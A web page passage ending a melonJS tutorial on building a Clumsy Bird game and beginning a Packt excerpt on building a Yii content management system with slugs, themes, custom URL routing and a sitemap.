"data/img/gameover.png"}, {name: "gameoverbg", type:"image", src: "data/img/gameoverbg.png"}, {name: "hit", type:"image", src: "data/img/hit.png"}, {name: "getready", type:"image", src: "data/img/getready.png"}, {name: "new", type:"image", src: "data/img/new.png"}, {name: "share", type:"image", src: "data/img/share.png"}, {name: "tweet", type:"image", src: "data/img/tweet.png"}, {name: "leader", type:"image", src: "data/img/leader.png"}, {name: "theme", type: "audio", src: "data/bgm/"}, {name: "hit", type: "audio", src: "data/sfx/"}, {name: "lose", type: "audio", src: "data/sfx/"}, {name: "wing", type: "audio", src: "data/sfx/"}, ]; Now let's create the game entities. First the HUD elements: create a HUD.js file in the entities folder. In this file you will create: A score entity A background layer entity The share buttons entities (Facebook, Twitter, and so on) game.HUD = game.HUD || {}; game.HUD.Container = me.ObjectContainer.extend({ init: function() { // call the constructor this.parent(); // persistent across level change this.isPersistent = true; // non collidable this.collidable = false; // make sure our object is always draw first this.z = Infinity; // give a name this.name = "HUD"; // add our child score object at the top left corner this.addChild(new game.HUD.ScoreItem(5, 5)); } }); game.HUD.ScoreItem = me.Renderable.extend({ init: function(x, y) { // call the parent constructor // (size does not matter here) this.parent(new me.Vector2d(x, y), 10, 10); // local copy of the global score this.stepsFont = new me.Font('gamefont', 80, '#000', 'center'); // make sure we use screen coordinates this.floating = true; }, update: function() { return true; }, draw: function (context) { if (game.data.start && me.state.isCurrent(me.state.PLAY)) this.stepsFont.draw(context, game.data.steps, me.video.getWidth()/2, 10); } }); var BackgroundLayer = me.ImageLayer.extend({ init: function(image, z, speed) { name = image; width = 900; height = 600; ratio = 1; // call parent constructor this.parent(name, width, height, image, z, ratio); }, update: function() { if (me.input.isKeyPressed('mute')) { game.data.muted = !game.data.muted; if (game.data.muted){ me.audio.disable(); }else{ me.audio.enable(); } } return true; } }); var Share = me.GUI_Object.extend({ init: function(x, y) { var settings = {}; settings.image = "share"; settings.spritewidth = 150; settings.spriteheight = 75; this.parent(x, y, settings); }, onClick: function(event) { var shareText = 'Just made ' + game.data.steps + ' steps on Clumsy Bird! Can you beat me? Try online here!'; var url = 'http://ellisonleao.github.io/clumsy-bird/'; FB.ui( { method: 'feed', name: 'My Clumsy Bird Score!', caption: "Share to your friends", description: ( shareText ), link: url, picture: 'http://ellisonleao.github.io/clumsy-bird/data/img/clumsy.png' } ); return false; } }); var Tweet = me.GUI_Object.extend({ init: function(x, y) { var settings = {}; settings.image = "tweet"; settings.spritewidth = 152; settings.spriteheight = 75; this.parent(x, y, settings); }, onClick: function(event) { var shareText = 'Just made ' + game.data.steps + ' steps on Clumsy Bird! Can you beat me? Try online here!'; var url = 'http://ellisonleao.github.io/clumsy-bird/'; var hashtags = 'clumsybird,melonjs' window.open('https://twitter.com/intent/tweet?text=' + shareText + '&hashtags=' + hashtags + '&count=' + url + '&url=' + url, 'Tweet!', 'height=300,width=400') return false; } }); You should notice that there are different me classes for different types of entities. The ScoreItem is a Renderable object that is created under an ObjectContainer and it will render the game steps on the play screen that we will create later. The share and Tweet buttons are created with the GUI_Object class. This class implements the onClick event that handles click events used to create the share events. The BackgroundLayer is a particular object created using the ImageLayer class. This class controls some generic image layers that can be used in the game. In our particular case we are just using a single fixed image, with fixed ratio and no scrolling. Now to the game entities. For this game we will need: BirdEntity: The bird and its behavior PipeEntity: The pipe object HitEntity: A invisible entity just to get the steps counting PipeGenerator: Will handle the PipeEntity creation Ground: A entity for the ground TheGround: The animated ground Container Add an entities.js file into the entities folder: var BirdEntity = me.ObjectEntity.extend({ init: function(x, y) { var settings = {}; settings.image = me.loader.getImage('clumsy'); settings.width = 85; settings.height = 60; settings.spritewidth = 85; settings.spriteheight= 60; this.parent(x, y, settings); this.alwaysUpdate = true; this.gravity = 0.2; this.gravityForce = 0.01; this.maxAngleRotation = Number.prototype.degToRad(30); this.maxAngleRotationDown = Number.prototype.degToRad(90); this.renderable.addAnimation("flying", [0, 1, 2]); this.renderable.addAnimation("idle", [0]); this.renderable.setCurrentAnimation("flying"); this.animationController = 0; // manually add a rectangular collision shape this.addShape(new me.Rect(new me.Vector2d(5, 5), 70, 50)); // a tween object for the flying physic effect this.flyTween = new me.Tween(this.pos); this.flyTween.easing(me.Tween.Easing.Exponential.InOut); }, update: function(dt) { // mechanics if (game.data.start) { if (me.input.isKeyPressed('fly')) { me.audio.play('wing'); this.gravityForce = 0.01; var currentPos = this.pos.y; // stop the previous one this.flyTween.stop() this.flyTween.to({y: currentPos - 72}, 100); this.flyTween.start(); this.renderable.angle = -this.maxAngleRotation; } else { this.gravityForce += 0.2; this.pos.y += me.timer.tick * this.gravityForce; this.renderable.angle += Number.prototype.degToRad(3) * me.timer.tick; if (this.renderable.angle > this.maxAngleRotationDown) this.renderable.angle = this.maxAngleRotationDown; } } var res = me.game.world.collide(this); if (res) { if (res.obj.type != 'hit') { me.device.vibrate(500); me.state.change(me.state.GAME_OVER); return false; } // remove the hit box me.game.world.removeChildNow(res.obj); // the give dt parameter to the update function // give the time in ms since last frame // use it instead ? game.data.steps++; me.audio.play('hit'); } else { var hitGround = me.game.viewport.height - (96 + 60); var hitSky = -80; // bird height + 20px if (this.pos.y >= hitGround || this.pos.y <= hitSky) { me.state.change(me.state.GAME_OVER); return false; } } return this.parent(dt); }, }); var PipeEntity = me.ObjectEntity.extend({ init: function(x, y) { var settings = {}; settings.image = me.loader.getImage('pipe'); settings.width = 148; settings.height= 1664; settings.spritewidth = 148; settings.spriteheight= 1664; this.parent(x, y, settings); this.alwaysUpdate = true; this.gravity = 5; this.updateTime = false; }, update: function(dt) { // mechanics this.pos.add(new me.Vector2d(-this.gravity * me.timer.tick, 0)); if (this.pos.x < -148) { me.game.world.removeChild(this); } return true; }, }); var PipeGenerator = me.Renderable.extend({ init: function() { this.parent(new me.Vector2d(), me.game.viewport.width, me.game.viewport.height); this.alwaysUpdate = true; this.generate = 0; this.pipeFrequency = 92; this.pipeHoleSize = 1240; this.posX = me.game.viewport.width; }, update: function(dt) { if (this.generate++ % this.pipeFrequency == 0) { var posY = Number.prototype.random( me.video.getHeight() - 100, 200 ); var posY2 = posY - me.video.getHeight() - this.pipeHoleSize; var pipe1 = new me.pool.pull("pipe", this.posX, posY); var pipe2 = new me.pool.pull("pipe", this.posX, posY2); var hitPos = posY - 100; var hit = new me.pool.pull("hit", this.posX, hitPos); pipe1.renderable.flipY(); me.game.world.addChild(pipe1, 10); me.game.world.addChild(pipe2, 10); me.game.world.addChild(hit, 11); } return true; }, }); var HitEntity = me.ObjectEntity.extend({ init: function(x, y) { var settings = {}; settings.image = me.loader.getImage('hit'); settings.width = 148; settings.height= 60; settings.spritewidth = 148; settings.spriteheight= 60; this.parent(x, y, settings); this.alwaysUpdate = true; this.gravity = 5; this.updateTime = false; this.type = 'hit'; this.renderable.alpha = 0; this.ac = new me.Vector2d(-this.gravity, 0); }, update: function() { // mechanics this.pos.add(this.ac); if (this.pos.x < -148) { me.game.world.removeChild(this); } return true; }, }); var Ground = me.ObjectEntity.extend({ init: function(x, y) { var settings = {}; settings.image = me.loader.getImage('ground'); settings.width = 900; settings.height= 96; this.parent(x, y, settings); this.alwaysUpdate = true; this.gravity = 0; this.updateTime = false; this.accel = new me.Vector2d(-4, 0); }, update: function() { // mechanics this.pos.add(this.accel); if (this.pos.x < -this.renderable.width) { this.pos.x = me.video.getWidth() - 10; } return true; }, }); var TheGround = Object.extend({ init: function() { this.ground1 = new Ground(0, me.video.getHeight() - 96); this.ground2 = new Ground(me.video.getWidth(), me.video.getHeight() - 96); me.game.world.addChild(this.ground1, 11); me.game.world.addChild(this.ground2, 11); }, update: function () { return true; } }) Note that every game entity inherits from the me.ObjectEntity class. We need to pass the settings of the entity on the init method, telling it which image we will use from the resources along with the image measure. We also implement the update method for each Entity, telling it how it will behave during game time. Now we need to create our scenes. The game is divided into: TitleScreen PlayScreen GameOverScreen We will separate the scenes into js files. First create a title.js file in the screens folder: game.TitleScreen = me.ScreenObject.extend({ init: function(){ this.font = null; }, onResetEvent: function() { me.audio.stop("theme"); game.data.newHiScore = false; me.game.world.addChild(new BackgroundLayer('bg', 1)); me.input.bindKey(me.input.KEY.ENTER, "enter", true); me.input.bindKey(me.input.KEY.SPACE, "enter", true); me.input.bindPointer(me.input.mouse.LEFT, me.input.KEY.ENTER); this.handler = me.event.subscribe(me.event.KEYDOWN, function (action, keyCode, edge) { if (action === "enter") { me.state.change(me.state.PLAY); } }); //logo var logoImg = me.loader.getImage('logo'); var logo = new me.SpriteObject ( me.game.viewport.width/2 - 170, -logoImg, logoImg ); me.game.world.addChild(logo, 10); var logoTween = new me.Tween(logo.pos).to({y: me.game.viewport.height/2 - 100}, 1000).easing(me.Tween.Easing.Exponential.InOut).start(); this.ground = new TheGround(); me.game.world.addChild(this.ground, 11); me.game.world.addChild(new (me.Renderable.extend ({ // constructor init: function() { // size does not matter, it's just to avoid having a zero size // renderable this.parent(new me.Vector2d(), 100, 100); //this.font = new me.Font('Arial Black', 20, 'black', 'left'); this.text = me.device.touch ? 'Tap to start' : 'PRESS SPACE OR CLICK LEFT MOUSE BUTTON TO START ntttttttttttPRESS "M" TO MUTE SOUND'; this.font = new me.Font('gamefont', 20, '#000'); }, update: function () { return true; }, draw: function (context) { var measure = this.font.measureText(context, this.text); this.font.draw(context, this.text, me.game.viewport.width/2 - measure.width/2, me.game.viewport.height/2 + 50); } })), 12); }, onDestroyEvent: function() { // unregister the event me.event.unsubscribe(this.handler); me.input.unbindKey(me.input.KEY.ENTER); me.input.unbindKey(me.input.KEY.SPACE); me.input.unbindPointer(me.input.mouse.LEFT); me.game.world.removeChild(this.ground); } }); Then, create a play.js file on the same folder: game.PlayScreen = me.ScreenObject.extend({ init: function() { me.audio.play("theme", true); // lower audio volume on firefox browser var vol = me.device.ua.contains("Firefox") ? 0.3 : 0.5; me.audio.setVolume(vol); this.parent(this); }, onResetEvent: function() { me.audio.stop("theme"); if (!game.data.muted){ me.audio.play("theme", true); } me.input.bindKey(me.input.KEY.SPACE, "fly", true); game.data.score = 0; game.data.steps = 0; game.data.start = false; game.data.newHiscore = false; me.game.world.addChild(new BackgroundLayer('bg', 1)); this.ground = new TheGround(); me.game.world.addChild(this.ground, 11); this.HUD = new game.HUD.Container(); me.game.world.addChild(this.HUD); this.bird = me.pool.pull("clumsy", 60, me.game.viewport.height/2 - 100); me.game.world.addChild(this.bird, 10); //inputs me.input.bindPointer(me.input.mouse.LEFT, me.input.KEY.SPACE); this.getReady = new me.SpriteObject( me.video.getWidth()/2 - 200, me.video.getHeight()/2 - 100, me.loader.getImage('getready') ); me.game.world.addChild(this.getReady, 11); var fadeOut = new me.Tween(this.getReady).to({alpha: 0}, 2000) .easing(me.Tween.Easing.Linear.None) .onComplete(function() { game.data.start = true; me.game.world.addChild(new PipeGenerator(), 0); }).start(); }, onDestroyEvent: function() { me.audio.stopTrack('theme'); // free the stored instance this.HUD = null; this.bird = null; me.input.unbindKey(me.input.KEY.SPACE); me.input.unbindPointer(me.input.mouse.LEFT); } }); Finally, the gameover.js screen: game.GameOverScreen = me.ScreenObject.extend({ init: function() { this.savedData = null; this.handler = null; }, onResetEvent: function() { me.audio.play("lose"); //save section this.savedData = { score: game.data.score, steps: game.data.steps }; me.save.add(this.savedData); // clay.io if (game.data.score > 0) { me.plugin.clay.leaderboard('clumsy'); } if (!me.save.topSteps) me.save.add({topSteps: game.data.steps}); if (game.data.steps > me.save.topSteps) { me.save.topSteps = game.data.steps; game.data.newHiScore = true; } me.input.bindKey(me.input.KEY.ENTER, "enter", true); me.input.bindKey(me.input.KEY.SPACE, "enter", false) me.input.bindPointer(me.input.mouse.LEFT, me.input.KEY.ENTER); this.handler = me.event.subscribe(me.event.KEYDOWN, function (action, keyCode, edge) { if (action === "enter") { me.state.change(me.state.MENU); } }); var gImage = me.loader.getImage('gameover'); me.game.world.addChild(new me.SpriteObject( me.video.getWidth()/2 - gImage.width/2, me.video.getHeight()/2 - gImage.height/2 - 100, gImage ), 12); var gImageBoard = me.loader.getImage('gameoverbg'); me.game.world.addChild(new me.SpriteObject( me.video.getWidth()/2 - gImageBoard.width/2, me.video.getHeight()/2 - gImageBoard.height/2, gImageBoard ), 10); me.game.world.addChild(new BackgroundLayer('bg', 1)); this.ground = new TheGround(); me.game.world.addChild(this.ground, 11); // share button var buttonsHeight = me.video.getHeight() / 2 + 200; this.share = new Share(me.video.getWidth()/3 - 100, buttonsHeight); me.game.world.addChild(this.share, 12); //tweet button this.tweet = new Tweet(this.share.pos.x + 170, buttonsHeight); me.game.world.addChild(this.tweet, 12); //leaderboard button this.leader = new Leader(this.tweet.pos.x + 170, buttonsHeight); me.game.world.addChild(this.leader, 12); // add the dialog witht he game information if (game.data.newHiScore) { var newRect = new me.SpriteObject( 235, 355, me.loader.getImage('new') ); me.game.world.addChild(newRect, 12); } this.dialog = new (me.Renderable.extend({ // constructor init: function() { // size does not matter, it's just to avoid having a zero size // renderable this.parent(new me.Vector2d(), 100, 100); this.font = new me.Font('gamefont', 40, 'black', 'left'); this.steps = 'Steps: ' + game.data.steps.toString(); this.topSteps= 'Higher Step: ' + me.save.topSteps.toString(); }, update: function () { return true; }, draw: function (context) { var stepsText = this.font.measureText(context, this.steps); var topStepsText = this.font.measureText(context, this.topSteps); var scoreText = this.font.measureText(context, this.score); //steps this.font.draw( context, this.steps, me.game.viewport.width/2 - stepsText.width/2 - 60, me.game.viewport.height/2 ); //top score this.font.draw( context, this.topSteps, me.game.viewport.width/2 - stepsText.width/2 - 60, me.game.viewport.height/2 + 50 ); } })); me.game.world.addChild(this.dialog, 12); }, onDestroyEvent: function() { // unregister the event me.event.unsubscribe(this.handler); me.input.unbindKey(me.input.KEY.ENTER); me.input.unbindKey(me.input.KEY.SPACE); me.input.unbindPointer(me.input.mouse.LEFT); me.game.world.removeChild(this.ground); this.font = null; me.audio.stop("theme"); } });  Here is how the ScreenObjects works: First it calls the init constructor method for any variable initialization. onResetEvent is called next. This method will be called every time the scene is called. In our case the onResetEvent will add some objects to the game world stack. The onDestroyEvent acts like a garbage collector and unregisters bind events and removes some elements on the draw calls. Now, let's put it all together in the index.html file: <!DOCTYPE HTML> <html lang="en"> <head> <title>Clumsy Bird</title> </head> <body> <!-- the facebook init for the share button --> <div id="fb-root"></div> <script> window.fbAsyncInit = function() { FB.init({ appId : '213642148840283', status : true, xfbml : true }); }; (function(d, s, id){ var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) {return;} js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/pt_BR/all.js"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk')); </script> <!-- Canvas placeholder --> <div id="screen"></div> <!-- melonJS Library --> <script type="text/javascript" src="lib/melonJS-1.0.2.js" ></script> <script type="text/javascript" src="js/entities/HUD.js" ></script> <script type="text/javascript" src="js/entities/entities.js" ></script> <script type="text/javascript" src="js/screens/title.js" ></script> <script type="text/javascript" src="js/screens/play.js" ></script> <script type="text/javascript" src="js/screens/gameover.js" ></script> </body> </html> Step 3 - Flying! To run our game we will need a web server of your choice. If you have Python installed, you can simply type the following in your shell: $python -m SimpleHTTPServer Then you can open your browser at http://localhost:8000. If all went well, you will see the title screen after it loads, like in the following image: I hope you enjoyed this post!  About this author Ellison Leão (@ellisonleao) is a passionate software engineer with more than 6 years of experience in web projects and is a contributor to the MelonJS framework and other open source projects. When he is not writing games, he loves to play drums.
Read more
  • 0
  • 11
  • 8603
Banner background image

article-image-building-content-management-system
Packt
25 Sep 2014
25 min read
Save for later

Building a Content Management System

Packt
25 Sep 2014
25 min read
In this article by Charles R. Portwood II, the author of Yii Project Blueprints, we will look at how to create a feature-complete content management system and blogging platform. (For more resources related to this topic, see here.) Describing the project Our CMS can be broken down into several different components: Users who will be responsible for viewing and managing the content Content to be managed Categories for our content to be placed into Metadata to help us further define our content and users Search engine optimizations Users The first component of our application is the users who will perform all the tasks in our application. For this application, we're going to largely reuse the user database and authentication system. In this article, we'll enhance this functionality by allowing social authentication. Our CMS will allow users to register new accounts from the data provided by Twitter; after they have registered, the CMS will allow them to sign-in to our application by signing in to Twitter. To enable us to know if a user is a socially authenticated user, we have to make several changes to both our database and our authentication scheme. First, we're going to need a way to indicate whether a user is a socially authenticated user. Rather than hardcoding a isAuthenticatedViaTwitter column in our database, we'll create a new database table called user_metadata, which will be a simple table that contains the user's ID, a unique key, and a value. This will allow us to store additional information about our users without having to explicitly change our user's database table every time we want to make a change: ID INTEGER PRIMARY KEYuser_id INTEGERkey STRINGvalue STRINGcreated INTEGERupdated INTEGER We'll also need to modify our UserIdentity class to allow socially authenticated users to sign in. To do this, we'll be expanding upon this class to create a RemoteUserIdentity class that will work off the OAuth codes that Twitter (or any other third-party source that works with HybridAuth) provide to us rather than authenticating against a username and password. Content At the core of our CMS is our content that we'll manage. For this project, we'll manage simple blog posts that can have additional metadata associated with them. Each post will have a title, a body, an author, a category, a unique URI or slug, and an indication whether it has been published or not. Our database structure for this table will look as follows: ID INTEGER PRIMARY KEYtitle STRINGbody TEXTpublished INTEGERauthor_id INTEGERcategory_id INTEGERslug STRINGcreated INTEGERupdated INTEGER Each post will also have one or many metadata columns that will further describe the posts we'll be creating. We can use this table (we’ll call it content_metadata) to have our system store information about each post automatically for us, or add information to our posts ourselves, thereby eliminating the need to constantly migrate our database every time we want to add a new attribute to our content: ID INTEGER PRIMARY KEYcontent_id INTEGERkey STRINGvalue STRINGcreated INTEGERupdated INTEGER Categories Each post will be associated with a category in our system. These categories will help us further refine our posts. As with our content, each category will have its own slug. Before either a post or a category is saved, we'll need to verify that the slug is not already in use. Our table structure will look as follows: ID INTEGER PRIMARY KEYname STRINGdescription TEXTslug STRINGcreated INTEGERupdated INTEGER Search engine optimizations The last core component of our application is optimization for search engines so that our content can be indexed quickly. SEO is important because it increases our discoverability and availability both on search engines and on other marketing materials. In our application, there are a couple of things we'll perform to improve our SEO: The first SEO enhancement we'll add is a sitemap.xml file, which we can submit to popular search engines to index. Rather than crawl our content, search engines can very quickly index our sitemap.xml file, which means that our content will show up in search engines faster. The second enhancement we'll be adding is the slugs that we discussed earlier. Slugs allow us to indicate what a particular post is about directly from a URL. So rather than have a URL that looks like http://chapter6.example.com/content/post/id/5, we can have URL's that look like: http://chapter6.example.com/my-awesome-article. These types of URLs allow search engines and our users to know what our content is about without even looking at the content itself, such as when a user is browsing through their bookmarks or browsing a search engine. Initializing the project To provide us with a common starting ground, a skeleton project has been included with the project resources for this article. Included with this skeleton project are the necessary migrations, data files, controllers, and views to get us started with developing. Also included in this skeleton project are the user authentication classes. Copy this skeleton project to your web server, configure it so that it responds to chapter6.example.com as outlined at the beginning of the article, and then perform the following steps to make sure everything is set up: Adjust the permissions on the assets and protected/runtime folders so that they are writable by your web server. In this article, we'll once again use the latest version of MySQL (at the time of writing MySQL 5.6). Make sure that your MySQL server is set up and running on your server. Then, create a username, password, and database for our project to use, and update your protected/config/main.php file accordingly. For simplicity, you can use ch6_cms for each value. Install our Composer dependencies: Composer install Run the migrate command and install our mock data: php protected/yiic.php migrate up --interactive=0psql ch6_cms -f protected/data/postgres.sql Finally, add your SendGrid credentials to your protected/config/params.php file: 'username' => '<username>','password' => '<password>','from' => '[email protected]') If everything is loaded correctly, you should see a 404 page similar to the following: Exploring the skeleton project There are actually a lot of different things going on in the background to make this work even if this is just a 404 error. Before we start doing any development, let's take a look at a few of the classes that have been provided in our skeleton project in the protected/components folder. Extending models from a common class The first class that has been provided to us is an ActiveRecord extension called CMSActiveRecord that all of our models will stem from. This class allows us to reduce the amount of code that we have to write in each class. For now, we'll simply add CTimestampBehavior and the afterFind() method to store the old attributes for the time the need arises to compare the changed attributes with the new attributes: class CMSActiveRecordCMSActiveRecord extends CActiveRecord{public $_oldAttributes = array();public function behaviors(){return array('CTimestampBehavior' => array('class' => 'zii.behaviors.CTimestampBehavior','createAttribute' => 'created','updateAttribute' => 'updated','setUpdateOnCreate' => true));}public function afterFind(){if ($this !== NULL)$this->_oldAttributes = $this->attributes;return parent::afterFind();}} Creating a custom validator for slugs Since both Content and Category classes have slugs, we'll need to add a custom validator to each class that will enable us to ensure that the slug is not already in use by either a post or a category. To do this, we have another class called CMSSlugActiveRecord that extends CMSActiveRecord with a validateSlug() method that we'll implement as follows: class CMSSLugActiveRecord extends CMSActiveRecord{public function validateSlug($attributes, $params){// Fetch any records that have that slug$content = Content::model()->findByAttributes(array('slug' =>$this->slug));$category = Category::model()->findByAttributes(array('slug' =>$this->slug));$class = strtolower(get_class($this));if ($content == NULL && $category == NULL)return true;else if (($content == NULL && $category != NULL) || ($content !=NULL && $category == NULL)){$this->addError('slug', 'That slug is already in use');return false;}else{if ($this->id == $$class->id)return true;}$this->addError('slug', 'That slug is already in use');return false;}} This implementation simply checks the database for any item that has that slug. If nothing is found, or if the current item is the item that is being modified, then the validator will return true. Otherwise, it will add an error to the slug attribute and return false. Both our Content model and Category model will extend from this class. View management with themes One of the largest challenges of working with larger applications is changing their appearance without locking functionality into our views. One way to further separate our business logic from our presentation logic is to use themes. Using themes in Yii, we can dynamically change the presentation layer of our application simply utilizing the Yii::app()->setTheme('themename) method. Once this method is called, Yii will look for view files in themes/themename/views rather than protected/views. Throughout the rest of the article, we'll be adding views to a custom theme called main, which is located in the themes folder. To set this theme globally, we'll be creating a custom class called CMSController, which all of our controllers will extend from. For now, our theme name will be hardcoded within our application. This value could easily be retrieved from a database though, allowing us to dynamically change themes from a cached or database value rather than changing it in our controller. Have a look at the following lines of code: class CMSController extends CController{public function beforeAction($action){Yii::app()->setTheme('main');return parent::beforeAction($action);}} Truly dynamic routing In our previous applications, we had long, boring URL's that had lots of IDs and parameters in them. These URLs provided a terrible user experience and prevented search engines and users from knowing what the content was about at a glance, which in turn would hurt our SEO rankings on many search engines. To get around this, we're going to heavily modify our UrlManager class to allow truly dynamic routing, which means that, every time we create or update a post or a category, our URL rules will be updated. Telling Yii to use our custom UrlManager Before we can start working on our controllers, we need to create a custom UrlManager to handle routing of our content so that we can access our content by its slug. The steps are as follows: The first change we need to make to allow for this routing is to update the components section of our protected/config/main.php file. This will tell Yii what class to use for the UrlManager component: 'urlManager' => array('class' => 'application.components.CMSUrlManager','urlFormat' => 'path','showScriptName' => false) Next, within our protected/components folder, we need to create CMSUrlManager.php: class CMSUrlManager extends CUrlManager {} CUrlManager works by populating a rules array. When Yii is bootstrapped, it will trigger the processRules() method to determine which route should be executed. We can overload this method to inject our own rules, which will ensure that the action that we want to be executed is executed. To get started, let's first define a set of default routes that we want loaded. The routes defined in the following code snippet will allow for pagination on our search and home page, enable a static path for our sitemap.xml file, and provide a route for HybridAuth to use for social authentication: public $defaultRules = array('/sitemap.xml' => '/content/sitemap','/search/<page:d+>' => '/content/search','/search' => '/content/search','/blog/<page:d+>' => '/content/index','/blog' => '/content/index','/' => '/content/index','/hybrid/<provider:w+>' => '/hybrid/index',); Then, we'll implement our processRules() method: protected function processRules() {} CUrlManager already has a public property that we can interface to modify the rules, so we'll inject our own rules into this. The rules property is the same property that can be accessed from within our config file. Since processRules() gets called on every page load, we'll also utilize caching so that our rules don't have to be generated every time. We'll start by trying to load any of our pregenerated rules from our cache, depending upon whether we are in debug mode or not: $this->rules = !YII_DEBUG ? Yii::app()->cache->get('Routes') : array(); If the rules we get back are already set up, we'll simple return them; otherwise, we'll generate the rules, put them into our cache, and then append our basic URL rules: if ($this->rules == false || empty($this->rules)) { $this->rules = array(); $this->rules = $this->generateClientRules(); $this->rules = CMap::mergearray($this->addRssRules(), $this- >rules); Yii::app()->cache->set('Routes', $this->rules); } $this->rules['<controller:w+>/<action:w+>/<id:w+>'] = '/'; $this->rules['<controller:w+>/<action:w+>'] = '/'; return parent::processRules(); For abstraction purposes, within our processRules() method, we've utilized two methods we'll need to create: generateClientRules, which will generate the rules for content and categories, and addRSSRules, which will generate the RSS routes for each category. The first method, generateClientRules(), simply loads our default rules that we defined earlier with the rules generated from our content and categories, which are populated by the generateRules() method: private function generateClientRules() { $rules = CMap::mergeArray($this->defaultRules, $this->rules); return CMap::mergeArray($this->generateRules(), $rules); } private function generateRules() { return CMap::mergeArray($this->generateContentRules(), $this- >generateCategoryRules()); } The generateRules() method, that we just defined, actually calls the methods that build our routes. Each route is a key-value pair that will take the following form: array( '<slug>' => '<controller>/<action>/id/<id>' ) Content rules will consist of an entry that is published. Have a look at the following code: private function generateContentRules(){$rules = array();$criteria = new CDbCriteria;$criteria->addCondition('published = 1');$content = Content::model()->findAll($criteria);foreach ($content as $el){if ($el->slug == NULL)continue;$pageRule = $el->slug.'/<page:d+>';$rule = $el->slug;if ($el->slug == '/')$pageRule = $rule = '';$pageRule = $el->slug . '/<page:d+>';$rule = $el->slug;$rules[$pageRule] = "content/view/id/{$el->id}";$rules[$rule] = "content/view/id/{$el->id}";}return $rules;} Our category rules will consist of all categories in our database. Have a look at the following code: private function generateCategoryRules() { $rules = array(); $categories = Category::model()->findAll(); foreach ($categories as $el) { if ($el->slug == NULL) continue; $pageRule = $el->slug.'/<page:d+>'; $rule = $el->slug; if ($el->slug == '/') $pageRule = $rule = ''; $pageRule = $el->slug . '/<page:d+>'; $rule = $el->slug; $rules[$pageRule] = "category/index/id/{$el->id}"; $rules[$rule] = "category/index/id/{$el->id}"; } return $rules; } Finally, we'll add our RSS rules that will allow RSS readers to read all content for the entire site or for a particular category, as follows: private function addRSSRules() { $categories = Category::model()->findAll(); foreach ($categories as $category) $routes[$category->slug.'.rss'] = "category/rss/id/ {$category->id}"; $routes['blog.rss'] = '/category/rss'; return $routes; } Displaying and managing content Now that Yii knows how to route our content, we can begin work on displaying and managing it. Begin by creating a new controller called ContentController in protected/controllers that extends CMSController. Have a look at the following line of code: class ContentController extends CMSController {} To start with, we'll define our accessRules() method and the default layout that we're going to use. Here's how: public $layout = 'default';public function filters(){return array('accessControl',);}public function accessRules(){return array(array('allow','actions' => array('index', 'view', 'search'),'users' => array('*')),array('allow','actions' => array('admin', 'save', 'delete'),'users'=>array('@'),'expression' => 'Yii::app()->user->role==2'),array('deny', // deny all users'users'=>array('*'),),);} Rendering the sitemap The first method we'll be implementing is our sitemap action. In our ContentController, create a new method called actionSitemap(): public function actionSitemap() {} The steps to be performed are as follows: Since sitemaps come in XML formatting, we'll start by disabling WebLogRoute defined in our protected/config/main.php file. This will ensure that our XML validates when search engines attempt to index it: Yii::app()->log->routes[0]->enabled = false; We'll then send the appropriate XML headers, disable the rendering of the layout, and flush any content that may have been queued to be sent to the browser: ob_end_clean();header('Content-type: text/xml; charset=utf-8');$this->layout = false; Then, we'll load all the published entries and categories and send them to our sitemap view: $content = Content::model()->findAllByAttributes(array('published'=> 1));$categories = Category::model()->findAll();$this->renderPartial('sitemap', array('content' => $content,'categories' => $categories,'url' => 'http://'.Yii::app()->request->serverName .Yii::app()->baseUrl)) Finally, we have two options to render this view. We can either make it a part of our theme in themes/main/views/content/sitemap.php, or we can place it in protected/views/content/sitemap.php. Since a sitemap's structure is unlikely to change, let's put it in the protected/views folder: <?php echo '<?xml version="1.0" encoding="UTF-8"?>'; ?><urlset ><?php foreach ($content as $v): ?><url><loc><?php echo $url .'/'. htmlspecialchars(str_replace('/', '', $v['slug']), ENT_QUOTES, "utf-8"); ?></loc><lastmod><?php echo date('c',strtotime($v['updated']));?></lastmod><changefreq>weekly</changefreq><priority>1</priority></url><?php endforeach; ?><?php foreach ($categories as $v): ?><url><loc><?php echo $url .'/'. htmlspecialchars(str_replace('/', '', $v['slug']), ENT_QUOTES, "utf-8"); ?></loc><lastmod><?php echo date('c',strtotime($v['updated']));?></lastmod><changefreq>weekly</changefreq><priority>0.7</priority></url><?php endforeach; ?></urlset> You can now load http://chapter6.example.com/sitemap.xml in your browser to see the sitemap. Before you make your site live, be sure to submit this file to search engines for them to index. Displaying a list view of content Next, we'll implement the actions necessary to display all of our content and a particular post. We'll start by providing a paginated view of our posts. Since CListView and the Content model's search() method already provide this functionality, we can utilize those classes to generate and display this data: To begin with, open protected/models/Content.php and modify the return value of the search() method as follows. This will ensure that Yii's pagination uses the correct variable in our CListView, and tells Yii how many results to load per page. return new CActiveDataProvider($this, array('criteria' =>$criteria,'pagination' => array('pageSize' => 5,'pageVar' =>'page'))); Next, implement the actionIndex() method with the $page parameter. We've already told our UrlManager how to handle this, which means that we'll get pretty URI's for pagination (for example, /blog, /blog/2, /blog/3, and so on): public function actionIndex($page=1){// Model Search without $_GET params$model = new Content('search');$model->unsetAttributes();$model->published = 1;$this->render('//content/all', array('dataprovider' => $model->search()));} Then we'll create a view in themes/main/views/content/all.php, that will display the data within our dataProvider: <?php $this->widget('zii.widgets.CListView', array('dataProvider'=>$dataprovider,'itemView'=>'//content/list','summaryText' => '','pager' => array('htmlOptions' => array('class' => 'pager'),'header' => '','firstPageCssClass'=>'hide','lastPageCssClass'=>'hide','maxButtonCount' => 0))); Finally, copy themes/main/views/content/all.php from the project resources folder so that our views can render. Since our database has already been populated with some sample data, you can start playing around with the results right away, as shown in the following screenshot: Displaying content by ID Since our routing rules are already set up, displaying our content is extremely simple. All that we have to do is search for a published model with the ID passed to the view action and render it: public function actionView($id=NULL){// Retrieve the data$content = Content::model()->findByPk($id);// beforeViewAction should catch thisif ($content == NULL || !$content->published)throw new CHttpException(404, 'The article you specified doesnot exist.');$this->render('view', array('id' => $id,'post' => $content));} After copying themes/main/views/content/view.php from the project resources folder into your project, you'll be able to click into a particular post from the home page. In its actions present form, this action has introduced an interesting side effect that could negatively impact our SEO rankings on search engines—the same entry can now be accessed from two URI's. For example, http://chapter6.example.com/content/view/id/1 and http://chapter6.example.com/quis-condimentum-tortor now bring up the same post. Fortunately, correcting this bug is fairly easy. Since the goal of our slugs is to provide more descriptive URI's, we'll simply block access to the view if a user 